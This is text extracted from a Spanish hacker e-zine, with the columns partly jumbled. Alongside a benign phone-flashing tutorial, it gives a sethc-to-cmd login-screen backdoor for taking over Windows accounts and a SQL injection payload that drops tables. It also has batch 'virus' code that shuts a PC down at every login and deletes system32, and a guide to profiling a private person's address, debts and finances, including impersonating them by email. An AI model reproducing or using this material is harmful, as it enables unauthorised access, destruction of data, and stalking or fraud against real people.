Vous êtes sur la page 1sur 66

 

 
CUH e-zine 2ª edicion Introducción

Bienvenido a la CUH e-zine 2ª edición


Sean bienvenidos a la segunda edición de la revista Solo me queda agradecer a todos los
CUH e-zine. colaboradores por el gran trabajo que hacen
Me complace presentaros esta gran e-zine que ha todos y cada uno de ellos.
sido posible gracias a un gran trabajo llevado a
cabo conjuntamente por numerosos usuarios de Agradecimientos a: Aleksteir, LTSmash,
nuestra comunidad voluntariamente.Os hago un gallloo, Furious Dami, ElPerro, ZYR, Ni0,
pequeño índice para que no os perdáis ; -) The Shadow, Logan_Doax, |_ocutus,
-Introducción 1 JUCA, elektro, MadMouse,
DaRkDiAm0nd, nexus 1 ,Orlando_rock ,
-Hacking nwb 4
veralex y channelly .
-Ingeniería Social 6
Gracias a todos ellos ( espero no haberme
-Como flashear su w600 9 dejado a nadie atrás ) , y sobre todo también
-Introducción al bacth II 13
a los lectores y usuarios que nos animan a
todos a continuar con este gran proyecto.
-Introducción al lenguaje C 15
Espero que sea de su agrado.
-Metodología de programación 19

-Introducción al ASM 22
También me gustaría reconocer el trabajo
de aleksteir, ya que sinceramente es uno de
-Starting HTML 27 los organizadores que más empeño y trabajo
-Seguridad informática 31
ha puesto en la e-zine .

-Herramientas administrativas 36 Solo eso, espero que la disfruten ; )


-Guía distribuciones Linux 40

-Marco Retro Style 44

-Modding Gallery 47

-Estructura Fisica del Disco Duro 50

-Asterisk 53

-Introducción a la Electrónica 57

-Multimedia (Juegos) 60

-Off topic- Humor 63


CUH e-zine 2ª edicion Hacking Newbie

Hacking Newbie By Furious Dami

• Permisos para interactuar (darle comandos)


con otros

• programas si un programa que interactúa


con otro esta ejecutándose como
Administrador o Limitado no puede transferir
datos a otros programas. Como ya he dicho
antes con SYSTEM si se puede ya que tiene
más privilegios que un administrador.
OBTENIENDO PRIVILEGIOS SYSTEM
Comencemos

Para empezar tenemos que abrir la carpeta


System32 (esta ubicada en: C:\Windows\System32\)
y en ella localizar el archivo: Sethc.

Archivos Usados:
Cmd: Es la consola, en donde ejecutaremos el
explorador.

Sethc: Es el programa que aparece cuando


presionamos 5 veces seguidas Shift.
A sethc lo copiamos en una carpeta.
Ahora volvemos a System32 y nos olvidamos de la
otra carpeta ya que no la necesitaremos por el
momento.
Bueno, ahora aprenderemos a obtener privilegios Ahora en System32 buscamos a Cmd y lo copiamos
SYSTEM en Windows (2k o superior).c en la carpeta System32 (la que estamos), a la copia
Lo primero que debemos saber es: le cambiamos el nombre a Sethc y cerramos sección.

¿QUE SON LOS PRVILEGIOS SYSTEM? Ahora en la Pantalla de Bienvenida (en donde se
eligen los usuarios) presionamos 5 veces seguidas la
SYSTEM es algo así como un súper usuario, ya que tecla Shift.
SYSTEM tiene más privilegios que un Administrador.
Con System incluso podríamos borrar archivos que Nos aparecerá una pantallita negra (consola) y en
un administrador no puede, cambiar contraseñas del ella escribiremos “Start Explorer” sin comillas.
administrador principal, etc. Si nos aparece la barra de tareas es porque todo
funcionó bien.
¿PARA QUE WINDOWS USA SYSTEM? Ahora podemos hacer lo que queramos (incluso
crear usuarios, cambiar la contraseña del
Esto es sencillo, como muchos de ustedes habrán administrador, etc.).
visto en el Administrador de Tareas hay programas
que en la columna de usuario dicen que están siendo Después para volver a dejar todo como estaba solo
ejecutados como “SYSTEM”. pegamos el archivo sethc (que copiamos en otra
Este privilegio se le da a los programas por dos carpeta) en la carpeta System32 y listo. Ya esta todo
motivos: arreglado.

• Para que sean más difíciles de ser


finalizados por un virus o por el usuario.

• Debido a que el administrador no tiene


CUH e-zine 2ª edicion Hacking Newbie

INYECCIÓN SQL consulta := "SELECT * FROM usuarios WHERE


nombre = '" + name + "';"
Si escribes tu nombre (Ej: "Daniel"), nada anormal
sucedería, la aplicación generaría una sentencia
SQL parecida a la siguiente, que es correcta, en
donde se seleccionaría al usuario "Daniel":
SELECT * FROM usuarios WHERE nombre = 'Daniel';
Pero si un usuario malintencionado escribe como
nombre de usuario: "Daniel'; DROP TABLE usuarios;
SELECT * FROM datos WHERE nombre LIKE '%", se
generaría la siguiente consulta SQL, (el color verde
es lo que sucederia si solo pusiera el nombre, el azul
es el dato, y el rojo, el código SQL inyectado):
SELECT * FROM usuarios WHERE nombre = 'Daniel';
DROP TABLE usuarios;
SELECT * FROM datos WHERE nombre LIKE '%';
La base de datos ejecutaría la consulta en orden,
seleccionaría el usuario 'Daniel', borraría la tabla
'usuarios' y seleccionaría datos que no están
Es una vulnerabilidad al nivel de la validación de las disponibles para usuarios normales.
entradas a la base de datos de una aplicación web.
Se origina por el filtrado incorrecto de las variables
utilizadas en las partes del programa con código
FAQ:
SQL.
¿Porque se llama “Inyección”?
Inyección SQL se le llama cuando se inserta o
"inyecta" un código SQL “maligno" entro de otro Se llama inyección porque consiste en introducir
código SQL para modificar su funcionamiento dentro del código normal un código malicioso. En
normal, y hacer que se ejecute maliciosamente el resumen, estamos inyectando un código malo dentro
código en la base de datos. de un bueno.
La inyección SQL es un problema de seguridad que
debe ser tomado en cuenta por el programador para
prevenirlo. Un programa hecho con descuido,
ignorancia y falta de revisión, podrá ser vulnerable y
la seguridad del sistema puede quedar ciertamente
comprometida.

Esta vulnerabilidad se da tanto en programas de


escritorios como en paginas web, ya que éstas
generalmente funcionan mediante programas que se
ejecutan en el SERVIDOR que las aloja.

La vulnerabilidad ocurre cuando un programa crea


una sentencia SQL, que contiene la información
necesitada y el código inyectado, y hace una
consulta a la base de datos sin verificar el contenido
de la sentencia. Más Información
Al ejecutarse esa consulta en la base de datos, el http://imperva.com/application_defense_center/glos
código SQL inyectado también se ejecutará y podría sary/sql_injection.html
hacer una cantidad de cosas, como insertar
registros, modificar o eliminar datos, autorizar http://msdn.microsoft.com/library/default.asp?url=/li
accesos e, incluso, ejecutar código malicioso en el brary/en-us/dnsqlmag04/html/InjectionProtection.asp
computador.
http://governmentsecurity.org/articles/SQLinjectionB
Supongamos que este código es de una aplicación asicTutorial.php
web y contiene el parámetro name que es el valor de
nombre que le dimos :
CUH e-zine 2ª edicion Ingeniería Social 2

Ingeniería Social Parte 2 By ElPerro

humano, que está esperando a que alguien lo


escuche, que lo interprete y por último, que
establezca una conexión activa.

Ingeniería Social 2
Footprinting & Scanning [Recopilación de datos de
un objetivo]
Lic. Dra. Mónica Fernández [Psicóloga]
Dr. Javier Paradelo [Abogado]
Lic. Aruel Ángel Drekk [ElPerro]

La siguiente guía contó con asesoramiento de profesionales en


medicina y leyes. Basado en experiencias propias y relato de
terceros.

Conexiones Activas
Concepto 2
Para entender el concepto. Una vez que enviamos
una solicitud para conectarnos a un sistema, este nos
solicita nombre de usuario y clave [autentificación],
comprueba que esos nombres de usuario y clave
estén en sus bases de datos [autenticación] y nos
deja pasar.

Esto establece una relación de “confianza” con ese


sistema, nos deja pasar e incluso nos da la
bienvenida en muchos casos.
En términos informáticos, el Footprinting refiere al Cuando establecemos una relación de confianza con
seguimiento de cerca de los recursos que posea un una persona, esta, al vernos llegar, nos abre las
sistema objetivo. El Scanning, en cambio, refiere a un puertas, nos da la mano, nos deja pasar y nos da la
barrido general y a la vez profundo que haga bienvenida.
visibles las brechas abiertas que un sistema posea, a
fines de determinar puntos vulnerables en sus Control Remoto Verbal [CRV, me gusta como suena]
servicios y/o protocolos en ejecución. Concepto 3
Este es un concepto muy largo e incluso puede
Analicemos los siguientes conceptos en orden de resultar aburrido, pero en la práctica resulta
ejecución. extremadamente entretenido. De todas formas voy a
resumirlo todo lo que pueda sin perderle sentido.
Conexiones Pasivas Aunque lo que sigue ahora puede parecer muy tonto
Concepto 1 o incluso ficticio, es real.
Cuando un sistema se encuentra “escuchando” Esta es una técnica muy usada en el ámbito
[Listening] se puede denominar de alguna manera, comercial y publicitario.
que está a la espera de que se entable una conexión Cuantas veces un vendedor altamente experimentado
a ese puerto/sistema. tocó a nuestra puerta ofreciéndonos algún objeto o
servicio que simplemente no necesitamos, pero que
Esto sería una manera de compararlo con el ser igual adquirimos…MUCHAS y si decís que no,
CUH e-zine 2ª edicion Ingeniería Social 2

simplemente no te creo. va a permitirte prestar extrema atención en todos los


detalles. Lo Creas o no, vas a volverte sumamente
Para la creación de este concepto conté con el observador en lo mas mínimo del ámbito cotidiano.
asesoramiento de una Licenciada en psicología, la Este es un don que poseen prácticamente todos los
Dra. Mónica Fernández [MN: 75956] de la ciudad de niños de 0 a 10 años y que desgraciadamente
Río Gallegos, Santa Cruz, Argentina. pierden con el paso del tiempo.

El individuo es inteligente, calculador, atento. La Enfoque emisor


masa es tonta, temerosa y distraída, por ende, es Esto es mucho más complicado que lo anteriormente
miles de veces más simple engañar a un grupo expuesto.
numeroso de personas que a un solo individuo y es Una vez que sientas que tenés toda la atención del
por eso que hay que analizar detalladamente cada emisor, es cuando podes tomar el verdadero control
concepto de estas guías antes de atreverse a actuar. de la conversación y efectuar un ataque CRV
Un ejemplo, enviar SpaMM o un HOAX a miles de [Perdón, pero me
Resolver juegos como
personas causa que al menos un par de cientos, lo “Encuentra las XX
gusta mucho como
crean. Si lo envías a uno solo, es %80 seguro que no diferencias” o suena].
obtenés resultado alguno [aunque en este caso crucigramas ayuda Comenzar a
resulta muy estadístico mas que analítico]. tremendamente. gesticular y
Situaciones cotidianas, verbalizar de la
caseras como el cambio misma manera que
de un objeto de lugar el emisor es una
pueden hacer que tu
parte importante de
sentido de la percepción
se agudice al máximo. la práctica, el haber
prestado atención a
sus ojos al hablar
de diversos temas, nos permite saber cuales son sus
intereses, y porque no, sus pasiones [ver concepto de
Enfoque receptor Enfoque Visual]. Automáticamente generamos que el
Antes de hablar hay que saber escuchar [Con esto emisor [ahora receptor] confíe en cada palabra que
me gané a las lectoras :p] y es así que debemos sale de tu boca y preste atención a cada frase.
prestar una detenida atención a gestos, articulación Inconscientemente el individuo esta siendo
verbal y enfoque visual del emisor para poder “programado verbalmente”.
efectuar un movimiento acertado. Es como si un No voy a extenderme en esto último debido a que
administrador te este dando su nombre de usuario y varía tremendamente el resultado según la persona,
clave codificados, solo debemos decodificar el pero básicamente el concepto es el mismo en el
mensaje. %100 de los casos. Solo recae en cada uno, en la
Es muy difícil poder prestar atención a tantos experiencia, habilidad e imaginación.
detalles sin perder el hilo de la charla. Para esto,
desarrollé una practica muy sencilla, que en pocas ¿Que tiene esto que ver con la Ingeniería Social?
horas frente al espejo, la perfeccionás. Mucho más de lo que uno imagina.
Consiste en hablar sobre un tema interesante o no, e Como dije una vez, un ladrón no va por la calle, ve
ir apuntando [anotando] o, porqué no, filmando un banco y dice “El día está lindo, los pájaros
[recomendado] cada gesto que efectuás, luego cantan, las mujeres pasean a sus maridos y/o
pasas a la charla, grabás la conversación y por mascotas…voy a robarlo…” y entra a punta de
último al enfoque visual ([+]). Se que resulta irrisorio pistola, a ciegas, sin saber si hay guardias, cuantos
e incluso ridículo. son, si están armados o no, etc. Un ladrón que se
precie como tal, va a estudiar atentamente a su
[+] Enfoque Visual objetivo, va a entablar una conexión activa o pasiva
El enfoque visual es una reacción involuntaria del ojo [ver conceptos] y por último, ataca.
humano.
Cuando una persona está ansiosa por una situación ¿Y el chiste donde está?
o un resultado, la pupila se dilata 5 veces su tamaño Cuando establecemos una conexión activa con una
normal y cuando simplemente no se encuentra persona, podemos absorber una cantidad
interesada, la pupila se contrae a un pequeño impresionante de datos que, bien recopilados,
puntito negro en el iris… pueden significar la diferencia entre un ataque
En esto se basa un vendedor experimentado cuando exitoso y un tremendo fracaso. Por eso se hace
te mira a los ojos e incluso, los modernos “detectores importante esta recopilación de datos, llegado un
de mentiras” que no solo basan su resultado en el momento, podemos hablar y gesticular, e incluso
ritmo cardíaco sino también en este concepto. pensar y actuar como otra persona a tal punto de no
Al terminar, simplemente analizá los resultados. Esto reconocernos a nosotros mismos. Esto te puede
CUH e-zine 2ª edicion Ingeniería Social 2

parecer muy gracioso, pero es totalmente tremendamente fácil recoger datos de cualquier
involuntario y, si lo practicás alguna vez [aunque sea persona.
solo por diversión] vas a darte cuenta de lo que te Existen las unidades básicas o comandos en donde
digo. se reúnen los políticos postulantes a un cargo, sus
seguidores, etc. Para debatir, conocerse y demás.
Estos puntos de información nos proveen de un
material invaluable: “El Padrón Electoral”.
Un libraco enorme que posee datos tales como:

-Nombre y apellido completos


-Número de documento
-Domicilio
-Escuela en la que vota [esto no nos sirve para nada]

Obtener esos datos también es viable con un padrón


electrónico. En tu e-mail seguramente tenés muchos
ofrecimientos de padrones y bases de datos de
personas.
Un sitio muy interesante es
http://www.globinfo.com.ar [No es gratis] que te
provee de un informe completo sobre un sujeto. Si
Práctica vas a usarlo, te recomiendo establecerte una casilla
Al comenzar, como dije antes, debemos tener un de correo con un nombre como el de tu objetivo. Ej.:
objetivo. Vamos a comenzar recopilando información Javier Paradelo, creamos un e-mail como
de nuestro objetivo estableciendo una CONEXIÓN jparadelo@yahoo.com.ar de manera que la gente de
PASIVA. GlobInfo solo revise el encabezado y lo envíe sin
mas averiguaciones.
El Footprinting en Ingeniería Social
Una persona normal tiene una casa, un trabajo,
familia, en ocasiones auto, o un vehículo para
movilizarse.

Nombre y apellido
Es muy simple esta averiguación de datos,
probablemente lo más básico.
Una forma fácil de averiguar todo dato posible es la
recorrida por el vecindario, las simples consultas al
Obtener datos financieros
almacén de la esquina pueden traer datos muy
En Argentina una opción muy sencilla [y gratuita] es
completos de la cantidad de habitantes de una
bcra.gov.ar. El sitio Web del Banco Central provee de
vivienda.
información clara. Para esto debemos poseer el
número de CUIL del objetivo [anses.gov.ar provee de
NOTA: Recordemos un pequeño párrafo del articulo esa info. en
anterior [ver Introducción a la Ingeniería Social]. http://www.anses.gov.ar/autopista/Serv_publicos/cuil
Hablo de la vestimenta/disfraces. Tenemos que .htm ] e ingresarlo en el casillero ubicado en
mantener las formas. Vestirnos bien [traje, corbata, http://200.69.211.85/cenries/cr010000.asp?error=0
etc.] pero sin llamar la atención. No queremos que Esto puede darnos una muy buena señal de entrada
piensen que somos delincuentes y nos vean con al mundo de esta persona. Al saber si posee deudas
desconfianza. o no, si tiene cuentas bancarias o no, si usa servicios
Contar con un buen léxico, un trato simpático y de prestamos/tarjetas de crédito, etc. Podemos
agradable es primordial para no levantar ningún tipo resumir nuestro trabajo ampliamente.
de sospechas, pero debemos ser cautelosos, la idea
principal es que, por mas simpáticos que seamos, [Editado para CUH EZINE]
deben olvidarse de nosotros ni bien cruzamos la En el capitulo siguiente seguimos obteniendo datos
puerta. vía telefónica, personalmente y acudiendo a vías
También es posible con solo pasar por fuera de la externas [vecinos, etc.].
casa y recoger la correspondencia dirigida a ese
domicilio. Pero atención: ESTO SI ES UN DELITO. ElPerro – Río Gallegos, Santa Cruz, Argentina
Si ya teníamos el nombre y apellido, no es ningún
reto la recopilación de otros datos.
En Argentina, sobre todo en época de elecciones, es
CUH e-zine 2ª edicion Flashear SU W600

Como Flashear Su w600 By ZyR


15

-Far Manager:
http://www.4shared.com/file/25333230/bacf8a92/Fa
rManager170.html?dirPwdVerified=6eef5d15

-SEFP:
http://www.4shared.com/file/25333121/d695351c/SE
FP.html?dirPwdVerified=6eef5d15
COMO FLASHEAR SU w600:
-Firmware (Con el que quieras actualizar el cel, Yo
*Introduccion: Este tutorial es para la comunidad aqui te proporciono el R7CA017):
Underground Hispana (www.el-hacker.com), Del **FS:
area phreaking, Centrado a el “Flasheo de el celular http://www.4shared.com/file/24530151/fb4fe49c/W6
sony ericsson w600i”... 00_R7CA017_FS_AMERICA_2_RED49.html?dirPwdVe
rified=6eef5d15
Bien primero que nada, Al final de este tutorial hay
un “F.A.Q”, En donde se explican algunas preguntas **MAIN:
frecuentes, Si tienes alguna(s) ve hasta abajo de este http://www.4shared.com/file/24526916/175f93ef/W6
manual para leerlas... 00_R7CA017_MAIN_NAM_2_RED49.html?dirPwdVer
ified=6eef5d15
*Nota: Para ir a los enlaces debes de pulzar la tecla
“Control” y dar clic sobre el enlace... -CDA (Custom pack):
http://www.4shared.com/file/24526918/f0e7bee8/Cu
stom_America_2.html?dirPwdVerified=6eef5d15

-Main Fake Del w550:


http://www.4shared.com/file/24527299/fbd08cf2/w5
50_r2e_dcu49r.html?dirPwdVerified=6eef5d15

*POR FAVOR LEE TODO EL MANUAL ANTES DE


HACERLO...

*Archivos que necesitas:

-Phone XS Alpha 3:
http://www.4shared.com/file/24527296/6b6f9163/Ph
one-XS_V210_Alpha3.html?dirPwdVerified=6eef5d15
Bien, Ya que tengas eso:
-Phone XS Beta:
http://www.4shared.com/file/24527155/5c95318c/Ph Instalas el far manager, Cuando lo instales, Vas a la
one- carpeta donde se instalo, Veras una carpeta llamada
XS_V201_Beta_package.html?dirPwdVerified=6eef5d Plugins, DENTRO DE PLUGINS, Metes la carpeta
SEFP...
CUH e-zine 2ª edicion Flashear SU W600

Dejas eso de lado por un momento... Bien, Ahora lo vas a configurar asi:
-------------------------------------------------
*NOTA: Debes de tener todo descomprimido, Estan *Flash Firmware:
en .rar debes de descomprimirlos (Los descomprimes **Selec Firmware:
con el WinRar, Si no lo tienes solo escribe en google
o aqui en Ba-k: WinRar y Listo te salen las ***Main Firmware: Aqui vas a meter el MAIN que
descargas)... descargaste de mi 4shared que es el MAIN mas
Bueno, Ahora abres el phone XS Beta (Este no se reciente de este modelo: R7CA017 (El main es el
instala solo lo abres, Ejecutas el .exe)... archivo .mbn, REPITO, DEBE DE ESTAR
Cuando abras el phone xs beta aparece una ventana DESCOMPRIMIDO, Osease en .mbn NO EN .rar)
blanca que dice: File y Help ***File System Image: Lo dejas en blanco

Clic en: File -> Start **Choose operations:

Ahora se abre otra ventana, Hay abajo miras y dice: ***Flash Main Firmware: Marcas el cuadrito de este
Settings, Flash, FSX™ y GDFS, Esta seleccionado el: ***Flash File System: Lo dejas SIN marcar
Settings ***Customize File System: Lo dejas SIN marcar

y Dice esto: **Procedure Control:

------------------------------------------------ ***Flash: AUN NO LO OPRIMAS Sigue leyendo


*Phone-XS Settings: -------------------------------------------------

**Communication Settings: *Ojo: Despues de aqui ya no hay vuelta atras...

***Communication Device *NOTA IMPORTANTE: TODA TU MUSICA,


***Baut Rate (Speed) IMAGENES, TONOS, JUEGOS, ETC, TODO, Va a
***Phone Model ser eliminado de tu celular, Asi es que te recomiendo
------------------------------------------------ que antes de seguir, Bajes todas las cosas
importantes que tengas en tu cel a tu compu, OJO:
Lo vas a configurar asi: Los contactos tambien se eliminana, Asi es que
pasalos a tu chip (SIM)...
------------------------------------------------
*Phone-XS Settings: Bien, Ahora:

**Communication Settings: Apagas tu celular, Le quitas la bateria, Le quitas el


chip (SIM), Le pones la bateria, y Le conectas el
***Communication Device: USB cable USB, AUN NO LO CONECTES...
***Baut Rate (Speed): 921600
***Phone Model: k750/D750/w800 (CID49) (En el programa otra vez), Ya que ayas echo lo
------------------------------------------------ anterior:
Le das clic en el boton de Flash y conectas el otro
Ahora seleccionas el de: Flash (Hasta abajo, En extremo del cable USB a la PC
donde estaba seleccionado Settings)...
*NOTA: Debes de conectar el celular apretando la
Ahora dice: tecla "C" (NO la tecla 2, LA "C" DE BORRAR),
Entonces APRIETAS LA TECLA "C" (La de borrar), y
------------------------------------------------- Conectas el cable USB... NO DEJES DE APRETAR LA
"C" hasta que empiezen a salir las letras (CUANDO
*Flash Firmware: YA SALGAN LAS LETRAS PUEDES SOLTAR EL
**Selec Firmware: BOTON "C")...
***Main Firmware
***File System Image Notaras como en el programa empiezan a salir
**Choose operations: letras, y En la parte de abajo se empieza a cargar
***Flash Main Firmware una barra, y Dice transferencia de flashblocks 1 de
***Flash File System 300 y algo (Algo asi)...
***Customize File System
**Procedure Control: Esperas a que termine, Cuando termine debe de
***Flash decir: Flash done* (o Algo asi)
-------------------------------------------------
CUH e-zine 2ª edicion Flashear SU W600

y La barra de abajo se abra llenado, y Dejaran de (Imagen 5)...


salir letras... Ahora buscamos el main fake del w550 (.ssw)... y Lo
abrimos (Imagen 5)...
Bien ahora le das clic en "Close" y desconectas el Cuando tengan todo como esta en la Imagen 5... Le
celular y LE QUITAS LA BATERIA, Despues de unos damos clic en start... (Imagen 5)...
10 sengundos se la vuelves a poner... (AUN NO LO y Veremos que sale esto: 5 flashblocks... (Imagen 6)...
PRENDAS)... Cuando salga esto: Finishing flash... Quiere decir
que ya termino (NOTA: Puede que se quede en 3
Ahora cierras el programa phone xs beta, y Lo flashblocks, No te preocupes, Solo dale en Stop y
vuelves a abrir, Haces lo mismo, File -> Start, En luego en close)... (Imagen 7)...
settings lo configuras igual, SOLO QUE EN FLASH Cerramos el phone (Imagen 7)...
AHORA LO VAS A CONFIGURAR ASI: Desconectamos el celular y le quitamos la pila...
Ahora abres el Far manager YA CON EL SEFP en la
------------------------------------------------- carpeta plugins
*Flash Firmware: Debemos de entrar primero en la parte del celular a
la ruta correspondiente de lo que vamos a meter...
**Selec Firmware: (Imagen 8)...
*Yo abri la ruta para meterle menus flash...
***Main Firmware: Lo dejas en blanco (tpa/preset/system/desktop/flash)...
***File System Image: Aqui vas a meter el FS (File
System) que descargaste de mi 4shared que es el FS PERO TU DEBES DE ABRIR ESTA RUTA:
mas reciente de este modelo: R7CA017 (El FS es el tpa\preset\custom
archivo .fbn, REPITO, DEBE DE ESTAR
DESCOMPRIMIDO, Osease en .fbn NO EN .rar) De el lado de la PC... Hay que abrir la carpeta en
donde tenemos el o los archivos que le vamos a
**Choose operations: meter (OSEASE EL CDA (Custom Pack, SOLO LOS
ARCHIVOS SUELTOS, NO LA CARPETA)... (Imagen
***Flash Main Firmware: Lo dejas SIN marcar 9)...
***Flash File System: Marcas el cuadrito de este Seleccionamos los archivos del lado de la PC (Boton
***Customize File System: Lo dejas SIN marcar derecho recuerden)... y le damos en copy (5 Copy)...
(Imagen 9)...
**Procedure Control: Saldra una ventana cuando y le damos otra vez en
copy... (Imagen 10)...
***Flash: Antes de que oprimas flash, Le conectas el Va a salir una ventana en para que veas que se va
cable a el celular (Si es que se lo desconectaste), y cargando... Debes de esperar a que se quite...
LUEGO APRIETAS "C" (La tecla de borrar), LE DAS (Imagen 11)...
CLIC EN FLASH y Conectas el otro extremo del cable Los debemos de visualizar del lado del celular
a la PC... ahora... (Imagen 12)...
-------------------------------------------------
y Va a pasar lo mismo que en el otro, Van a salir las NOTA: En la ruta: tpa\preset\custom Hay una
letras y la barra se empezara a cargar, SOLO QUE carpeta llamada drm ELIMINALA, Selecciónala con
AHORA SERAN MENOS "Flashblocks"... clic derecho del mouse y después clic en 8 Delete...
Cuando termine saldra lo mismo que el anterior, No *Bueno como recordaremos tenemos en modo flash
recuerdo si sale: Flash done*, o Flash finish, El caso el cel... Osea se que con el main fake del w550...
es que sale algo asi, y La barra estara llena y ya no Simplemente hay que meterle el MAIN ORIGINAL
saldran letras... para que reviva de nuevo el cel...
Le das clic en "Close" y desconectas el celular, y LE Ahora debemos de darle clic a los dos puntos (..)
QUITAS LA BATERIA por unos 10 segundos, y Se la hasta que nos salga una ventana roja y le damos e
vuelves a poner... YES... (Imagen 13)...
Abrimos el phone xs alpha... Viene en la carpeta: Sabras que lo puedes desconectar cuando ya no
Phone-XS_V2.10_Alpha3... (Imagen 1)... salga nada del lado de el celular... y cierras el far...
Ahora apagamos el celular... Le quitamos la pila... Le (Imagen 14)...
quitamos la SIM... Le ponemos la pila...
Le damos clic en start en el phone... (Imagen 2)...
Saldran unas letras... (Imagen 3)...
Cuando salgan las letras... Conectamos el cel
oprimiendo la tecla "c"... (Imagen 3)
Verificamos que salga: ready for open! (Imagen 4)...
Ahora veremos unas casillas para marcar...
Marcaremos la primera: Flash Main Firmware
CUH e-zine 2ª edicion Flashear SU W600

que no colocaste adecuadamente los archivos de el


CDA, o bien no le colocaste el CDA, Repite de nuevo
desde donde le metes el main fake (.ssw), y Ahora si
súbele los archivos que trae dentro la carpeta CDA...

P: y Esto de el flasheo para que me sirve¿?... Todo


esta igual que antes...
R: Bueno el flasheo sirve para varias cosas,
Primeramente el flasheo es actualizar el firmware
(software) de el celular, Si tenias una versión anterior
de firmware solucionara algunos problemas que
quizas puedas tener o tubiste (Se apagaba cuando
Ahora desconecta tu celular y quitale la pila... baias música, Se trababa, Se ponía en blanco, Etc),
Con este nuevo firm se solucionan esos problemas
Abre el phone xs alpha (El que usamos para meter el total o mayoritariamente, Aparte al flashear activas
MAIN FAKE DEL w550)... el flash lite del celular, Esto quiere decir que puedes
meterle menus flash para reproducirlos como
*AQUI HAY QUE HACER LO DE LA PRIMERA menus...
PARTE*: P: Como le meto los menus flasH¿?...
R: Sigue el mismo proseso de flasheo desde donde
Le damos clic en start en el phone... Saldrán unas metes el main fake (.ssw), Es decir, Mete el main
letras... Cuando salgan las letras... Conectamos el fake, Despues conectalo con el far manager, Solo
cel oprimiendo la tecla "c"... Verificamos que salga: que en vez de meter los archivos del CDA, Deberas
ready for open!, Ahora veremos unas casillas para de ir a esta ruta: tpa\preset\system\desktop\flash
marcar... Marcaremos la primera: Flash Main dentro de flash, Deberas meter los archivos .swf
Firmware... (Menus Flash Lite), y Despues sigues los mismos
Ahora buscamos el MAIN ORIGINAL, OSEA EL pasos, Sales de el far manager (..), y Le metes a el
ARCHIVO .mbn NO EL .ssw, EL .mbn... y Lo abrimos, celular el MAIN ORIGINAL (.mbn), y Ahora solo
Cuando tengan todo como esta en la imagen 8... Le tienes que activarlos con un tema .thm
damos clic en start... (Imagen 15)... P: Donde consigo menús flash lite¿?...
*DESPUES ES LO MISMO... R: Bueno pues hay varias webs en donde puedes
Solo Que Aqui Van a Ser 348 flashblocks (SI NO ME encontrar menús flash lite, Solo que en algunas
EQUIVOCO)... (Imagen 16)... necesitas cierta cantidad de mensajes para poder
Solo que cuando termine va a salir algo diferente a descargar, Yo tengo una web dedicada a la telefonía
antes... (Imagen 17)... celular y hay puedes encontrar muchos menús flash:
www.CityCelw.mi-web.es...
*Cuando Haya salido eso solamente tienen que P: Como activo los menús flash¿?...
cerrar el phone y desconectar su celular... Quitarle la R: Con un tema normal (.thm), Tienes que editarlo,
pila por unos segundos... Meterle el chip... Ponerle la Primero lo abres con winrar, Sacas los archivos que
pila... y Prenderlo... tenga dentro, Imágenes etc, Abra un archivo
llamado: theme.xml, Este archivo lo abrimos con el
Suerte a todos, y Pues ya saben que nadie los obliga bloc de notas, y Después de la línea que diga:
a hacerlo... <Sony_ericsson_theme vercion=”4.0”>
Abajo pondrán esto:
Suerte... <Desktop_style Type="File"
Saludos... Source="CambiarPorNombreDelMenuFlash.swf"/>
F.A.Qs:
Dejan todo lo demás igual, y Lo guardan, Ahora
P: Corro riesgos al hacer esto¿?... deben de comprimirlo TODO (Las imágenes, El
R: Si, Si no lo haces bien, Corres el riesgo de que se archivo theme.xml, Todo lo que extrajeron de el .thm)
dañe la GDFS (Global Data Flash Storage, Es una en un archivo .tar, (Les recomiendo el programa
parte importante de el celular en donde se guardan IZArc), Después de que compriman TODO en el .tar
datos como el CDA, IMEI, Modelo de Firmware, Etc), solo es cuestión de cambiar la extensión .tar por
Para reparar este problema se necesita un cable de .thm, y Listo, Lo suben a el celular y lo activan...
servicio y no son muy fáciles de conseguir que
digamos... *NOTA: El menú flash ya debe de estar dentro de el
P: Termine el proceso y todo salió bien, Pero al celular en la ruta: tpa\preset\system\desktop\flash
prender el celular me dice: Error de configuración
comuníquese con su operador local, Que paso¿?... En fin esas modificaciones entre muchas mas...
R: Lo que paso es que no lo finalizaste bien, Es decir
CUH e-zine 2ª edicion Introducción al Batch

INTRODUCCION AL BATCH 2 By Furious Dami


“C:\Windows\Menu Inicio\Programas\Inicio\”
Exit
Y lo tendríamos que guardar en la carpeta mis
documentos com el nombre “apaga” y lo que es
obvio, con extensión “.bat”.

Explicación:

@echo off
Echo off sirve para que no se vean los comandos
que coloquemos en el resto del Batch y el @ sirve
Programando… para que no se vea el comando echo off.
Copy “C:\Documents and
Settings\%username%\Mis documentos\apaga.bat”
“C:\Windows\Menu Inicio\Programas\Inicio\”
Sirve para copiar el archivo que se ha guardado con
el comando para apagar en el inicio de sección,
porque la carpeta Inicio tiene la capacidad de
arrancar todo lo que esta adentro de ella cuando se
inicia sección. Y %username% es para que aparezca
en el lugar especificado el nombre de usuario
(porque en la carpeta con el nombre de usuario se
Como programar en Batch y introducción a los guarda los documentos del usuario).
comandos. Exit
De aquí en adelante comenzaremos a crear los Sirve para salir del programa y evitar que se quede
primeros programas como calculadoras, abierto.
organizadores, virus, etc. Y nos introduciremos más a Antídoto:
los comandos como GOTO, SET, ECHO, START, etc. Shutdown –a
Sirve para anular las ordenes dadas por el comando
Los Virus en Batch shutdown. Pero hay que teclearlo en la consola.

En Batch generalmente se programan gusanos o Destruyendo el Sistema


virus pero como son comandos MS-Dos y de
Windows lo correcto sería llamarlos comandos Ahora crearemos un código para borrar todos los
maliciosos, a continuación veremos como se archivos del sistema y de arranque de Windows. (No
programan. se puede probar en su PC porque se rompería).
El codigo sería:
Apagando la PC @echo off
del /Q /F /S %systemroot%\system32\*.*
Aquí les voy a mostrar como se programa un virus exit
que haga que cada vez que inicie la sección a los 10 Explicación:
segundos se apague la PC y muestre el mensaje: Del /Q /F /S *.*
“Esto es un poderoso virus”. (Para probar solo Sirve para borrar todos los archivos de la carpeta
escribir Shutdown –s –f –t 10 – “esto es un poderoso “system32” que es una carpeta del sistema y el
virus” y no preocuparse porque solo te apagara la %systemroot% seria para ir a la carpeta del Sistema
PC y nada más ). Operativo que podría se C:\Windows\ pero varia
El código para esto seria: según la PC ,los parámetros del comando DEL
@echo off fueron explicados anteriormente y los *.* sirven para
Shutdown –s –f –t 10 –c “Esto es un poderoso virus” darle la orden de que borre todos los nombres de
Copy “C:\Documents and archivos en todas las extensiones.
Settings\%username%\Mis documentos\apaga.bat”
CUH e-zine 2ª edicion Introducción al Batch

